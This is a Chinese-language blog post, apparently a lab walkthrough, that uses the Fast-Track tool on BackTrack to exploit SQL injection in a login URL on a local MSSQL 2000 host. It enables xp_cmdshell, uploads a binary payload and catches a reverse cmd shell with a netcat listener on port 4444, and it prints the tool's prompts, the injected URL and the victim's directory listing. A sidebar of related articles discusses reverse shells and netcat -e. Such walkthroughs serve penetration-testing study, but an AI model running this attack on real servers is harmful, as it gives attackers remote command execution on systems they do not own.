MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell

最新推荐文章于 2019-01-08 14:24:00 发布
最新推荐文章于 2019-01-08 14:24:00 发布
阅读量1.1k 收藏
点赞数
分类专栏: backtrack fasttrack Reverse Shell netcat mssqlserver2000 SQL Injection
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9275419
版权

fasttrack操作:

root@bt:~# cd /pentest/exploits/fasttrack/
root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i
***********************************************
******* Performing dependency checks... *******
***********************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***

Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.

Your system has all requirements needed to run Fast-Track!
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Fast-Track Main Menu:

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Nmap Scripting Engine
    4.  Microsoft SQL Tools
    5.  Mass Client-Side Attack
    6.  Exploits
    7.  Binary to Hex Payload Converter
    8.  Payload Generator
    9.  Fast-Track Tutorials
    10. Fast-Track Changelog
    11. Fast-Track Credits
    12. Exit Fast-Track

    Enter the number: 4

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Microsoft SQL Attack Tools

    1. MSSQL Injector
    2. MSSQL Bruter
    3. SQLPwnage

    (q)uit

    Enter your choice : 1

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Enter which SQL Injector you want to use:

    1. SQL Injector - Query String Parameter Attack
    2. SQL Injector - POST Parameter Attack
    3. SQL Injector - GET FTP Payload Attack
    4. SQL Injector - GET Manual Setup Binary Payload Attack

    (q)uit

    Enter your choice: 1
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************


    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Requirements: PExpect
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    This module uses a reverse shell by using the binary2hex method for uploading.
    It does not require FTP or any other service, instead we are using the debug
    function in Windows to generate the executable.

    You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE

    So for example, when the tool asks you for the SQL Injectable URL, type:

    http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
             

    Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter

    Example:http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

    <ctrl>-c to exit to Main Menu...

    Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHERE
/pentest/exploits/fasttrack/bin/ftsrc/sqlbinarypayload.py:74: DeprecationWarning: os.popen2 is deprecated.  Use the subprocess module.
  ncstarter=os.popen2('xterm -geometry 60x20 -bg black -fg green -fn *-fixed-*-*-*-20-* -T "Fast-Track Binary Payload SQL Injector" -e nc -lvp 4444 2> /dev/null')
    Sending initial request to enable xp_cmdshell if disabled....
    Sending first portion of payload (1/4)....
    Sending second portion of payload (2/4)....
    Sending third portion of payload (3/4)...
    Sending the last portion of the payload (4/4)...
    Running cleanup before executing the payload...
    Running the payload on the server...
     You should have a shell if everything went good..Might take a couple seconds

另外起一个bash,来运行nc: 

root@bt:~# nc -l -p 4444

当fasttrack出现: 

    Running the payload on the server...

时,nc就连上了: 

root@bt:~# nc -l -p 4444
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..

C:\>dir
dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 3052-FA52

 C:\ 的目录

2012-03-24  11:55                 0 AUTOEXEC.BAT
2012-03-24  11:55                 0 CONFIG.SYS
2012-03-24  11:59    <DIR>          Documents and Settings
2013-07-02  21:45    <DIR>          msf3
2012-08-07  03:10       176,204,554 msf3.zip
2004-12-29  13:07            61,440 nc.exe
2013-07-01  22:45    <DIR>          Program Files
2013-05-01  22:15        16,232,448 python-2.7.4.msi
2013-07-06  17:57    <DIR>          Python27
2013-04-07  21:03        70,402,968 SQL2000SP4.exe
2013-06-30  21:58    <DIR>          SQL2KSP4
2013-06-30  21:53    <DIR>          SQLEVAL
2011-03-22  17:38       349,280,992 sqleval.exe
2013-07-01  20:52    <DIR>          WINDOWS
2013-05-22  20:55        20,868,704 Wireshark-win32-1.8.7.exe
               8 个文件    633,051,106 字节
               7 个目录  3,919,802,368 可用字节

C:\>exit
exit
root@bt:~#


feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Reverse-Shell-Client:反向外壳客户端是netcat反向外壳侦听器的基于Python的替代方案
05-08
反向外壳客户端 反向外壳客户端是netcat反向外壳侦听器( nc -lvp <port> )的基于Python的替代方案。 默认的反向Shell客户端( rsh-client.py )附带了许多功能,例如在您设法获得Shell的(基于Unix的)远程主机上上传,下载,执行和编辑文件。 您还可以下载独立版本( rsh-client-standalone.py ),这是一个较小的版本,没有自定义命令,当希望将shell作为另一个进程(如果netcat不可用)获取本地shell权限时,该版本最有用系统。
authlib-injector:构建自己的Minecraft身份验证系统
02-04
取得您可以从获取最新的authlib-injector。建立构建依赖:Gradle,JDK 8+。执行以下命令: gradle构建输出放在build/libs下。部署通过添加以下JVM参数来配置: -javaagent:{authlib-injector.jar 的路径}={验证...
使用netcat的正向 / 反向shell
weixin_33720078的博客
01-08 1181
reverse shell bind shell reverse shell描述图: 在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用...
netcat 实现shell反弹
u011975363的专栏
03-29 1408
反弹shell,效果类似于远程控制,当你连接上对方时,对方就控制了你的电脑,可执行你权限范围内的所有操作。 实现过程,受害者运行了攻击者给的相关代码后,主动与攻击者的服务器建立连接,使得攻击者成功控制受害者主机。 telnet,ssh为正向连接,由控制方去连接被控制方。 主机1 输入 主机2 输入 当输入ifconfig时可以查看到主机1的Ip信息说明反弹成功。...
SQL Injector - GET Manual Setup Binary Payload Attack
天元喜羊羊的博客
07-08 1007
bt5上操作: ***************************************************************** ** ** ** Fast-Track - A new beginning...
手工盲注辅助注入工具Blind-SQL-Injector.zip
最新发布
07-18
**SQL盲注助手Blind-SQL-Injector简介** SQL盲注(Blind SQL Injection)是一种安全漏洞,攻击者可以通过这种技术来探测和利用数据库系统,而无需直接获取数据或显示错误消息。Blind-SQL-Injector是一款专为手动...
k8s-sidecar-injector:Kubernetes边车注入服务
02-03
对于每个吊舱创建,注入程序都会获得一个(变异入场)webhook,询问是否允许吊舱启动,以及是否允许对吊舱进行什么更改。 对于在其上具有特殊注释的Pod(即injector.tumblr.com/request=logger:v1 ),我们重写了...
Vulnerability-and-Attack-Injector:漏洞和攻击者
05-15
一种在PHP文件中注入SQL Injection漏洞并自动对其进行攻击的工具 这些文件中使用了该软件: JoséFonseca,Marco Vieira,Henrique Madeira,“使用漏洞和攻击注入的Web安全机制评估”,IEEE可靠和安全计算交易,第...
k8s-env-injector
04-10
使用./shell.sh输入shell,然后使用./cli.sh watch监视更改。 部署方式 在charts目录中提供了舵图。 生成证书 Kubernetes要求通过HTTPS可以访问入网钩子。 脚本certs.sh包含用于生成将在Helm图表中准备使用的证书的...
Php reverse shell with netcat
kezhen的专栏
09-29 1750
摘自:http://www.binarytides.com/php-reverse-shell-with-netcat/ Once you are able to gain access to a remote website or server such that you can upload any arbitrary file to it, the next thing you wan
How to: Shellcode to reverse bind a shell with netcat(如何使用netcat进行shellcode反向链接)
Shellcode.Cool!
05-23 1494
Imagine you found a vulnerability in a web server and decided to take over that machine to do your dirty deeds, what do you do? Well, for starters, you have to figure out how to exploit the vulnerabil
(a)ttempt SQL Ping and Auto Quick Brute Force(未完待续)
天元喜羊羊的博客
07-08 1090
在BT5R3上,需要修改文件/pentest/exploits/fasttrack/config/fasttrack_config,改为: METASPLOIT_PATH=/opt/metasploit/app/ 否则会找不到msfcli。 然后进入fasttrack进行操作: root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i
metasploit的session操作
热门推荐
天元喜羊羊的博客
04-25 1万+
msf > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- -
metasploit运行run vnc
天元喜羊羊的博客
04-27 1万+
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.142 RHOST => 192.168.1.142 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
metasploit使用辅助模块
天元喜羊羊的博客
05-15 1万+
显示所有的辅助模块: msf > show auxiliary Auxiliary ========= Name Disclosure Date Rank Description ----
metasploit将命令行shell升级为meterpreter
天元喜羊羊的博客
04-28 8044
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set
metasploit文件格式漏洞渗透攻击(成功获得shell
天元喜羊羊的博客
05-14 7148
环境BT5R1 msf > use windows/fileformat/ms11_006_createsizeddibsection msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_t
dnsenum用法
天元喜羊羊的博客
05-16 6623
root@root:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl baidu.com dnsenum.pl VERSION:1.2.2 ----- baidu.com ----- Host's addresses: __________________ baidu.com
Acunetix-WVS中文教程:深度详解安全扫描与设置
- **Blind SQL Injector**:一种特定的注入技术,用于探测数据库漏洞,即使没有明确的参数提示也能运行。 **4. 工具组件** 教程还介绍了Acunetix WVS提供的多种实用工具,包括WebScanner(针对单个页面的快速扫描)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值